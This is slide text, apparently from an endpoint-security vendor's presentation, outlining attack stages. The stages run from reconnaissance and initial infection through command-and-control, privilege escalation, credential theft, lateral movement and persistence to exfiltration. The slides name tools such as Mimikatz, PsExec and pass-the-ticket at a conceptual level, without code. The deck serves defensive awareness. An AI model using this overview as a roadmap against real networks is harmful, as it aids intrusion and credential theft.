2. Total Endpoint Protection: #1 in EDR & Next-Gen AVTotal Endpoint Protection: #1 in EDR & Next-Gen AV
Initial Infection | C&C | Privilege Escalation | Recon | Lateral Movement | Damage
Are you under attack?
Lateral
Movement
Recon DamageC & C
Privilege
Escalation
3. Total Endpoint Protection: #1 in EDR & Next-Gen AVTotal Endpoint Protection: #1 in EDR & Next-Gen AV
External Recon
o People/Social Engineering
• Conferences
• Call help desk or admin
o Technology
• External scans
• Buy information & tools on
black market
o Business Intelligence
• Trusted relationships
• 3rd party vendors
“Even Rao, a highly experienced cybersecurity
researcher, nearly fell for the scam, as he
happened to have recently mailed a package
via UPS.”
4. Total Endpoint Protection: #1 in EDR & Next-Gen AVTotal Endpoint Protection: #1 in EDR & Next-Gen AV
Initial Infection
o Phishing & spear phishing
o Vulnerability exploit
o Infected USB drive
Lateral
Movement
Recon DamageC & C
Initial
Infection
Privilege
EscalationInitial Infection | C&C | Privilege Escalation | Recon | Lateral Movement | Damage
5. Total Endpoint Protection: #1 in EDR & Next-Gen AVTotal Endpoint Protection: #1 in EDR & Next-Gen AV
Initial Infection: Process Injection
Running a procedure as a
thread inside another process
o Evasion
o Reading host process memory
o Affecting host process
behavior
o Server persistence
Lateral
Movement
Recon DamageC & C
Initial
Infection
Privilege
EscalationInitial Infection | C&C | Privilege Escalation | Recon | Lateral Movement | Damage
6. Total Endpoint Protection: #1 in EDR & Next-Gen AVTotal Endpoint Protection: #1 in EDR & Next-Gen AV
Malicious code launches and carries out an
infection within a tool or process
o Unlike traditional malware
• Doesn’t use a file
o Runs in memory of the device
Examples of processes/tools
o Legitimate Windows processes
o Windows management interface
o Meterpreter
o Executing remote commands
Initial Infection: Fileless Malware
Recon DamageC &CInitial Infection | C&C | Privilege Escalation | Recon | Lateral Movement | Damage
7. Total Endpoint Protection: #1 in EDR & Next-Gen AVTotal Endpoint Protection: #1 in EDR & Next-Gen AV
Why
o Establish and maintain
connection to:
• Execute malicious code
• Update malware
• Sending back collected
info
• Provide heartbeat to
indicate the attack is
still alive
How
o Legitimate HTTP
o Legitimate DNS request
o Fast Flux
o TOR
o IRC
o Facebook / Twitter /
YouTube comments
o Domain Generation
Algorithm
Command & Control
Privilege
Escalation
Initial Infection | C&C | Privilege Escalation | Recon | Lateral Movement | Damage
8. Total Endpoint Protection: #1 in EDR & Next-Gen AVTotal Endpoint Protection: #1 in EDR & Next-Gen AV
Command & Control: Domain Generation Algorithm
o C&C servers quickly get
blacklisted
o DGA generates 1000’s of domains
• Predictable to attacker,
unpredictable to security
researcher
• One will be C&C
o When C&C domain blacklisted,
attacker:
• Selects another generated domain
• Registers it
• Continues attack
Spread Damage
Initial Infection | C&C | Privilege Escalation | Recon | Lateral Movement | Damage
9. Total Endpoint Protection: #1 in EDR & Next-Gen AVTotal Endpoint Protection: #1 in EDR & Next-Gen AV
Why
o Gain better
persistence
o Cred dump/user
impersonation
o Operate under the
radar
How
o Exploit
vulnerabilities
• Command line
vulnerability
• Process injection
o Leverage improper
configurations
• Local admin rights for
all users
• User lockout policies
Privilege Escalation
Initial Infection | C&C | Privilege Escalation | Recon | Lateral Movement | Damage
10. Total Endpoint Protection: #1 in EDR & Next-Gen AVTotal Endpoint Protection: #1 in EDR & Next-Gen AV
Privilege Escalation: Exploit Windows Vulnerabilities
o Windows kernel mode driver vulnerabilities
o Windows task scheduler vulnerabilities
o Vulnerabilities in Windows design
– Windows user account control (UAC)
– DLL search order
Initial Infection | C&C | Privilege Escalation | Recon | Lateral Movement | Damage
11. Total Endpoint Protection: #1 in EDR & Next-Gen AVTotal Endpoint Protection: #1 in EDR & Next-Gen AV
Why
o Paint a picture of the
IT infrastructure
• Who are the
administrators?
• What steps get me closer
to my target?
• What type of services are
running?
o Identify target and a
path to the target
How
o ARP scanning
o NetBIOS enumeration
o Port scanning
o Credential stealing
Internal Reconnaissance
Initial infection | C&C | Privilege Escalation | Recon | Lateral Movement | Damage
12. Total Endpoint Protection: #1 in EDR & Next-Gen AVTotal Endpoint Protection: #1 in EDR & Next-Gen AV
Recon: Port Scanning
o Services use ports to
communicate
• HTTP = 80, DNS = 53,
etc…
o Attacker scans the
subnet to find
exposed and
exploitable services
Spread DamageC & C DamageInitial Infection | C&C | Privilege Escalation | Recon | Lateral Movement | Damage
13. Total Endpoint Protection: #1 in EDR & Next-Gen AVTotal Endpoint Protection: #1 in EDR & Next-Gen AV
Recon: Credential Theft
o Mimikatz
o Windows
Credential Editor
o Lazagne
Initial Infection | C&C | Privilege Escalation | Recon | Lateral Movement | Damage
14. Total Endpoint Protection: #1 in EDR & Next-Gen AVTotal Endpoint Protection: #1 in EDR & Next-Gen AV
Why
o Gain access to
target machines
• Domain controllers
• OWA
o Persistence
How
o Use legitimate tools
maliciously
• Pass The Hash/Ticket
• Shares
• PSExec
• RDP
• SSH
• PowerShell
• SCCM
Lateral Movement
Initial Infection | C&C | Privilege Escalation | Recon | Lateral Movement | Damage
15. Total Endpoint Protection: #1 in EDR & Next-Gen AVTotal Endpoint Protection: #1 in EDR & Next-Gen AV
Lateral Movement: PsExec
Initial Infection | C&C | Privilege Escalation | Recon | Lateral Movement | Damage
Legitimate use
IT admin runs PsExec
to run a process on
a remote machine
interactively
Malicious use
Attacker runs PsExec
with stolen
credential hashes to
spread their malware
through an entire
network
16. Total Endpoint Protection: #1 in EDR & Next-Gen AVTotal Endpoint Protection: #1 in EDR & Next-Gen AV
Lateral Movement: PowerShell
Initial Infection | C&C | Privilege Escalation | Recon | Lateral Movement | Damage
Legitimate use
IT admin runs
PowerShell to monitor
firewall
Malicious use
Attacker PowerShell
with encoded commands
to spread malware
17. Total Endpoint Protection: #1 in EDR & Next-Gen AVTotal Endpoint Protection: #1 in EDR & Next-Gen AV
Lateral movement: Pass-the-Ticket
Legitimate authentication: Kerberos
Initial Infection | C&C | Privilege Escalation | Recon | Lateral Movement | Damage
18. Total Endpoint Protection: #1 in EDR & Next-Gen AVTotal Endpoint Protection: #1 in EDR & Next-Gen AV
Lateral movement: Pass-the-Ticket
Malicious use: Pass the Ticket
Initial Infection | C&C | Privilege Escalation | Recon | Lateral Movement | Damage
19. Total Endpoint Protection: #1 in EDR & Next-Gen AVTotal Endpoint Protection: #1 in EDR & Next-Gen AV
Why
o Establish long
term access
• Primary goal is
often persistent
accessibly
How
o Scheduled tasks
o Autoruns
o Temp files
o Fileless malware
Persistence
Initial Infection | C&C | Privilege Escalation | Recon | Lateral Movement | Damage
20. Total Endpoint Protection: #1 in EDR & Next-Gen AVTotal Endpoint Protection: #1 in EDR & Next-Gen AV
Damage
Initial Infection | C&C | Privilege Escalation | Recon | Lateral Movement | Damage
o FTP/SSH
o Email
o DNS
o Dropbox
o Pastebin
o Ransomware
o Corporate
financials
o Credit card
data
o System
corruption
Business Profit Sabotage
21. Total Endpoint Protection: #1 in EDR & Next-Gen AVTotal Endpoint Protection: #1 in EDR & Next-Gen AV
Initial Infection | C&C | Privilege Escalation | Recon | Lateral Movement | Damage
Are you under attack?
Lateral
Movement
Recon DamageC & C
Privilege
Escalation
22. Total Endpoint Protection: #1 in EDR & Next-Gen AVTotal Endpoint Protection: #1 in EDR & Next-Gen AV
Total Enterprise
PROTECTION